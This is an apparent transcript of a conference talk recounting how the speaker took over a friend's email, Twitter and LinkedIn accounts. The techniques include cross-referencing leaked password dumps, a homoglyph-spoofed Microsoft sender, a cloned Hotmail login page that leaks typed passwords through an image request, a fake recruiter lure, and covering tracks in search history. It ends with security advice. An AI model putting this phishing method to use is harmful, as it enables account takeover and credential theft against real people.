add a random string to the end of it just in case somebody has a big list of the hash of every possible like eight character string then they could possibly use that to like reverse what your hash was back into the password so you have to add this salt thing to the end and so you go okay okay and so now you're adding this salt and you add all the end of the password it's like this this is called a static sort and static means it's the same for all the passwords and so now you're adding the same thing to the end of every single password and the point of this is to prevent somebody with a big list of the hash of every single string from using that big list to reverse your password hashes but do you see the problem here the problem is that these two parts these two users have the same password and because we're adding the same thing to the end of the password the same the same static so the thing that's getting hashed is the same for both of these people in fact they're going to have the same password if and only if they have the same password hash and so even when we hash everything you can see these two these two users have the same password hash you don't know what it is you don't know what the password is but you know these two people have the same password because of the static salt thing uh so why am i telling you all about this static sold thing it's because i don't know what the soft is for the tumbler password dump even though it's the salt it's not meant to be a secret thing it's meant to be like public it's meant to be as public as like the usernames but i don't know what it is because it's not included in the text file because hackers are not good at documenting their stuff um so i'm like okay i really want to i really want to get my friends password out of this but i don't know how um so the first thing i did when i had the list was i searched for my friend's email address and i'm like okay if i grab for her email address i'll get all the lines that have her email address in it which is just the one with their password hash in it i'm like cool but i don't know what this don't know what this password hash goes to i don't know what password this password hash is of so here's the sneaky thing i do uh i search for her password hash in the file not her password just her password hash like an absolute madman because uh well what do you think will happen what do you think will happen when i type in her like when i grip for her password it should just be one like it should just be her line right should just have my friend dana's thing there's like 20 people who have the the same have the same password hash right and these people it's like a little pathway book club right they can all get along and these these fun these fun little book enthusiasts all have the same password on tumblr and so this tells me a few things um probably it's not a very good password since all these people have thought of the same one but again i'm very smug but i don't know what it is so i need to find out what it is and so here's what i do i get just the email addresses of those people in the password book club i throw away the password hashes don't know what i don't know what to do with the hash just get those email addresses these are all the people who have the same password as diana and then conveniently did you know that linkedin was also hacked in 2012 and uh dan dana was not in this list because she didn't have linkedin in 2012 but lots of people were and thanks to the hard work and gpu cycles of people in the password cracking community almost all those linkedin passwords are in plain text now they're not just hashes their emails and like you know just passwords you can just look at with your eyes and i was like wow i also just happen to have that lying around and so then i did this thing where i looked up the same people who in the password book club in the tumblr list in the linkedin list and i found most of them not all about 80 of them had the same password as each other on linkedin as well so isn't that really sweet that book club transcends like services um and i thought it was sweet and uh i found that most of them had the password query one and so this is a bit of a there's a bit of like a bit of a jump here but i'm guessing that my friend dana has the same password as all these people on tumblr okay i'm not guessing that's definitely true and then i'm guessing that they'll have the same password on linkedin and then i'm guessing that that password is this most frequent one this quote query one thing i'm guessing that that's diana's password and i'm like okay i've done it let's go uh cordy wants down the password i did it i'm hacking let's go it's time to use this thing i got hotmail type in and it's not the right password like that's not a hotmail password it was that was it wasn't it and i was like well damn why did i do all this work why did i go to all these great lengths okay whatever um so then i go to facebook and so i don't just try it on her hotmail i tried on everything i go to facebook and uh it says oh no that's not your facebook password but it's an old password it was your password about five months ago i'm like oh thanks facebook for taunting me i guess i'm too late um but i mean like okay so this did used to be her password she just happens to have changed it recently and i've somehow stumbled upon a person it has more than one password in their life um so i'm like okay fine i guess it's the hard way um which is what i didn't want to have to do so by the way uh this this is what i had planned this is what i thought this like hacking would be like i was going to be like ah it's so easy to hack someone you just look them up and all these lists you have lying around and it's as easy as that and so the rest of this talk will be about how it's not as easy as that always and so i'm like okay i guess i'm going to try and do this fishing thing i'm going to try and trick her into sending me the password because everyone else is doing it it's more work it's way more it's more work because you have to make something custom but like oh well i don't know is this how you do fishing i don't know it's my first time maybe i should do something like this i don't know you don't know that you don't know that it won't work um so now i'm not going to do that i'm going to do this here's the plan i come up with i'm going to send her a fake email from microsoft because she has hotmail it has to be microsoft and that email is going to take her to a login screen for hotmail but it's a fake login screen that actually sends me a password and then she'll go to the real hotmail login screen and just kind of keep going as if nothing happened this is my plan i don't know don't whatever and so um but to do this i'm going to need to make a hotmail account to send the email from so i go to i go to make a hotmail account which will let me open a world of benefits and i try to make one that looks like microsoft i try to make a microsoft account team and says no you can't do that presumably because the word microsoft is in the email address and they know i'm not microsoft and so i try to make my first name microsoft and my last name account team and they're like no you can't do that and presumably to stop exactly what i'm trying to do and fair enough however these are my round friends and they're these look like two o's don't they looks like i put two o's in this slide like an absolute fool but actually one of them is an o and one of them is a greek letter omicron which looks a lot like an o to you and me doesn't it but to a computer they're completely different like unicode code points and so like if you just spell microsoft like this with these omicrons then like that doesn't say microsoft but like to you and me it looks like it does and so like does this really work i'm sure you're wondering like surely like surely the billions of dollars at microsoft and the most advanced mines aren't going to be full but no does work yeah it does and so i make this i make this microsoft account team thing and i send it this email which says like i copied this from like a real microsoft email that i got i copied all the like styling and most of the text and it says oh you better log into your account in the next 48 hours or we're gonna lock it um oh please do it or it's gonna be real bad this oh boy there's like russians ipad dresses you wouldn't want that i don't know um and so it says like come and log in please um but again this is just an email like that link that that don't lock his account thing at the bottom there has to be a link to something and so i need to make that i need to make a website for that bottom button to link to so okay let's go this is the real what my login screen it was at the time and so i'm gonna uh i need to make a copy of this and so there's another way to make a copy of things there's this hacking tools technique i learned about where stuff have you seen this before step one if you right click on something step two you hit this button and when you hit that inspect element button that's the good stuff i think there are easier ways to copy websites but i always do it this way anyway so here's my copy of the website it looks the same because it is the same um but this time it's on my computer it's on localhost and so now i need to put on the internet somehow um and so i'm like how do i put this i can't link her to localhost how do i put this online and i found this like static hosting company website thing they're not paying me to say this but they have like they let you like host static files on the internet and this is really good because you get a custom subdomain so you can be anything dot aerobatic.io and they give you https for free and it's like two commands or something to do it and no one knows about it so all the good subdomains aren't taken um so like i'm sure it's a good static hosting site but it happens to also be a really good phishing hosting site so um thank you to these people you can use the promo code diana to be immediately reported to the authorities uh this so this is the one i made this is the um the the domain i chose the real hotmail login screen is like the real hotmail login domain is login.live.com and so i could have like made my own domain name and like made it look even more similar but i just don't think diana's going to look at this at the the url very much because she's not like a paranoid security person like us so um but then again for some reason login when you go to like a login screen the url doesn't look like that it looks like this it has a bunch of like stuff at the end and so i just added a bunch of stuff at the end like it it doesn't do anything i actually stole it from the google login screen um but whatever okay it's my first time and so here it is this is my fake login screen on the internet now i know it's the same picture but this time on the internet trust me um and so i also add these bonus features to it um the first one is that after she clicks the the login button the submit button it's going to add an image to the page and the image goes to a website i control forward slash diana and then question mark and then plus whatever password is so the reason i'm doing this is to try and steal whatever just trying to steal a password this is like a terrible awful way to do it that you probably shouldn't do but it's really easy so like i'm going to get a request to my website forward slash diana and then plus some password i don't know what this password is so it's going to be a 404 but then in my logs it's going to be a request for a 404 to diana and then the password so i'm just going to be looking at my logs for this diana thing and when it shows up i'll be like ah that's the password and then i make it so that after she clicks the button it waits one second and then goes to the real hotmail login screen the one second way to simulate australian internet speeds anyway here's the email i send it's like you know look out it's something real bad's gonna happen and you only got 48 hours because i'm creating time pressure and i'm doing all the good stuff i've seen random phishing emails do but i kind of just want this to work so come on click click the link and so i send it to her and search your anastasia 48 hours and then 24 hours later nothing happens i'm looking at my logs and she's not there so i'm like she hasn't clicked on it yet and so i'm like oh okay uh so i sent the email again saying like same thing but now you only have 48 hours and now you only have 24 hours you better click it and then 48 hours later she also doesn't click on it and i'm like oh okay all right like at this point i'm not actually hacking anyone i'm just emailing my friend i'm like okay that's a shame i guess it wasn't interesting enough email and fair enough the thing i learned from this is that people don't really care about emails from microsoft or about like emails from like like automated emails i care about emails from people which leads me to the next way i try and do this which is like okay she's gonna be like on the internet whatever and she's gonna get an email from a recruiter and the recruiter is gonna link her to another fake to the same fake login page and then you're going to go to a google doc and the login page is going to make a login to see a google doc is that such but this is microsoft this is hotmail hotmail doesn't have google docs is there such thing as microsoft google docs and so i look it up is this is that a thing is that a real thing and there is and it's called cloud sky something something something something something and like and so i'm like great and so i log into this and make oh no i think i make the make the document in something else and then copy and paste it into this um and so now i have a microsoft google doc and you might be wondering what document i made i made a resume like i think like fake but convincing looking resume and then i send her oh no before i do that i have to make the person who's going to send it to her i can't email her for me can't email her from a microsoft account team so i guess it's going to have to be from this fake person and so i go to the google login screen you can put whatever you want in these boxes it's very good and so i make this person called kathleen wheeler who's like a mix of a first name and last name from a real company that i found and then i sent her this which says this is me writing this sometimes i sound like i'm a recruiter i don't really know what could it sound like and i'm saying hey i work at this comedy company which you care about um which i looked up earlier on linkedin and uh somebody has listed you as a reference somebody has told us that you work together like somebody has said that they worked with you uh here's the resume tell us how you know them blah blah blah click here for the resume that link is obviously the one that goes to the fake login screen and then after all this text being like can you fill out this form and tell us these things and blah blah blah that's just to distract from the link and then it says also can uh can you let me a good time to call you is the phone number her phone number which i found earlier okay the reason i put a phone number there so she knows this is like for her it's not like an accident like this person clearly knows who she is and then i made a sweet email signature at the bottom with like a different font and everything i thought it was really good attention to detail or whatever and so i sent this to her and it totally works like she clicks it she taps in a password like the whole thing just works flawlessly and i was like wow that was really easy and then i looked a little bit closer and i'm like wait a minute this password that she sent me that's that's corey one that's i already have that one like that's already that's i already i was like what that's how could that did i do something wrong and then i was like no wait a minute here's what i've learned she does not know how to help me out that's what it is which which which in many ways is the ultimate defense against people so like don't don't don't shame her for this but also because my fake login screen will just say yes no matter what password you type in and actually thinks this is a password yeah and i'm like whoops i hope i can fix that after this is all over anyway so i up instead of giving up i update my login screen so now no matter what you type in it just says wrong password the first three times because my theory is that people who like memorize all their passwords uh they just try one and if it doesn't work let's try the other one and the other one they just unload all their passwords into the form and so um i also change it so if you try a qwerty one the counter doesn't go up so you can't just type 21 three times and so then i send her out then she replies and she's like no i haven't worked with this person which is true because i don't exist uh and then she's like yeah you can call me that's the right phone number and i'm not going to call her because i'm not capitalizing out and then i'm like then i have a reply being like oops that was the wrong resume oh for some reason you better click on this this makes no sense right like like if you think about this like if you stop and think about this oh there's another person who also worked with you around the same time but with different dates today and i sent you their resume instead of the other that doesn't make any sense right like this story doesn't work but it has the same like bait of like somebody says they know you and you have to click to find out who and so i'm like you know pl please just click on it anyway please i know um and she does and this time same thing happens she clicks on it and she like types in a thing she types the same thing three times which is this other password which looks a lot like cody one um oh also none of these are real but they're similar to what they actually were um this one's like shifted along by one on the keyboard i'm like hmm okay what's this password and so i go to hotmail and like using my using the advanced hacking software google chrome type the password into the hotmail login screen and press enter and it totally works i get into email and i'm like it's as easy as that everybody see it's simple okay so i did i got an email password but now what do i do like i try the same password on everything and it doesn't work i'm like great this person has three passwords in their lives and then she replies being like no i haven't worked with this person either why are you doing this what what's happening and i reply just being like don't worry about it don't stress about it you know i'll just handle it please don't email me anymore please just forget about this and she does she doesn't reply so i'm like great meanwhile i log into email and i click on i want to search for more passwords so i can log into more stuff and so i like click on the search bar thing and it shows me her last five searches and i'm like oh but the last five searches aren't anything interesting um but i want to search for like password and other things but if i do it then she'll see there's in her search history right so uh i write down the last five things she searched for and then search for my stuff and then search for those things in reverse so so it looks exactly the same because it only shows the last five microsoft knows what i've done but i i'm doing it anyway um and it totally works but i didn't find any passwords because i don't know i found a lot of passwords i already had but i didn't find any new passwords and i was like fine whatever so this is the end of the talk i guess that's it i mean our email never believe it when it says the end question mark no it's obviously not the end geez um the stock is called operation let's talk is called operation luigi and i'm like already in my friend's email you know it'd be a real shame to just kind of leave it at that you know be real shame to not like do anything with that so here's what operation luigi is here's what we need to do first thing is get into her twitter second thing is to not lock her out of her twitter because she needs to be in there too and also don't let her know that i'm in her stuff don't know they don't have to know that i'm in her twitter um so here's how i do it i go to twitter and i'll be like hey i forgot my password until it lets me reset it and like you know because i'm in her email now and so i can reset the password because it'll send me the email and i can click it and i can do that now and so i changed her twitter password to qwerty1 and so that's because this is the password that i think she thinks her password is and there's a little emails and blah blah blah wait for her to log in and because i need her to log in so i know that she's actually type 21 and she's back in her own account and i wait a while and then eventually she actually logs in and i'm like great it works she retweets she reshooted a picture of a dog and i was like yes okay so then i do the exact same thing with linkedin as i did with twitter and i try to change the linkedin password to kodi one as well but it doesn't let me presume because i got the qwerty one from the linkedin password jump so they know it's bad then there's a little box at the bottom which says require all devices to sign in with a new password which is like would you like to sign me out on like would you like to sign out all your other devices and i'm like absolutely not thank you linkedin for giving me this option it's unchecked by default so i can just change your password without even signing her out and so i just do that and then i log in and so okay now what let me explain so this picture of obama is here because i can't show you down as real pictures i have to show you uh because i can't show you how real profile pictures i'm going to show you what i did to her real profile pictures but with pictures of obama i don't know just go with it and so here's what her twitter picture was and i changed it to be like this i don't know if you can tell there's like it's like a low there's like a lightly transparent luigi there and so also she had a linkedin picture and i changed the linkedin picture to have like another luigi on it can you see it and so i just left it there for like i don't know weeks i don't know okay yeah good weeks i just left it there and no one said anything and i said okay i thought she might have noticed then but this is sort of like proof that i got somewhere and so you know nothing happened so i was like okay well was this over this was operational luigi because it's not over the remainder of this talk will be about operation waluigi and you know i came up with this like a long time ago back when this meme was like you know new anyway whatever waluigi let's go so i changed her link i changed her linkedin bio to be the entire wikipedia page for luigi and when i do this linkedin says her profile strength is advanced so thank you linkedin thank you linkedin for being there for me this entire talk anyway i changed her twitter to be this like i i want to make it super obvious so she i wanted to know that i'm there i want i want to be caught now like i'm trying to be caught i'm like hello notice me i'm very loud i tweet this from her account just go for it and she's online at the same time because it's like 7pm and she replies and she says omg to this thing and she says i've been hacked my dudes but then because i'm also logged in at the same time i reply as her saying oh no no it just seemed like the right thing to do at the time anyway then i tweet this then i create this and i keep doing things until she messages me and i treat longings for the days of this sweet lad and keep tweeting things and eventually she messages me and be like oh my gosh my twitter is this you and i'm like yes it's me don't worry nothing bad's happening i'll stop now it's all congratulations i guess you got me um and here's what happened after that um she loves her new waluigi life so much she goes and changes her facebook to be a waluigi themed even though i didn't even touch it um she listens to she's like gets really into luigi culture i'm not going to read this that like she like she like really got into it and she also asked me like wow how do i not get hacked like how do i what did i do wrong i'm like well you didn't do anything wrong but like this is kind of a question that people ask a lot right people ask security people like how do i stay safe what should i be doing online and these are just like regular people who ask this like not security people they're just like normal people they're not weird like us and they say oh how do i stay safe and sometimes the kind of answers they hear from security people are like oh you got to do all these things and live in a submarine and never go anywhere and you get to get all this advanced multi-factor ub keys or whatever and so like there are other things you can say you know so here's what i told her i was like well listen it's up to you right like there are things you can do to stay safe there are things you can do that they eat like there are things you can do to stay safe but they involve investing more time and effort it's up to you how much your investors up to you how much you care about this maybe you don't care and your finder is getting hacked that's okay that's a valid way to live your life um and so i help her set up two factor auth on her email because i'm about to do this blog post and publish a guide on how to hack her so i don't want it to be repeatable and so help her set up two factor authors so now she'll get a code on her phone which will be would have been way harder for me to get past because it's way harder to get past two factors you have to like i don't know fish the two-factor auth code or socially engineered the phone company too hard and so she was very happy that it wasn't that hard she was very happy that she could just do this and it wasn't like much extra effort for her because this is like the lowest effort highest security value thing i think that she could have done um and so she has a little app like this you know you know how to actually she has this little app and she's like yeah now i can just type in these codes um these backup codes are kind of a trap though and i kind of warned about only using the app because see that button that's like uh you know saved a text file or keep these codes somewhere safe no one clicks those buttons everyone's just like yeah whatever clothes like no one keeps these backup codes and so um that's why it's that's one of the reasons that's good type sms as a backup anyway in conclusion i just talked about luigi for like a long time so i hope you liked it and oh the last thing is you might be wondering like where did i get these before i was like oh i had these lying around probably wondering where did i get the like linkedin and tumblr like password hashes where did where do they actually come from thank you very much thank you hello thank you alex for uh that talk we have a lovely cup for you thank you um can melissa oh sorry alyssa come up to the stage awesome thanks\n"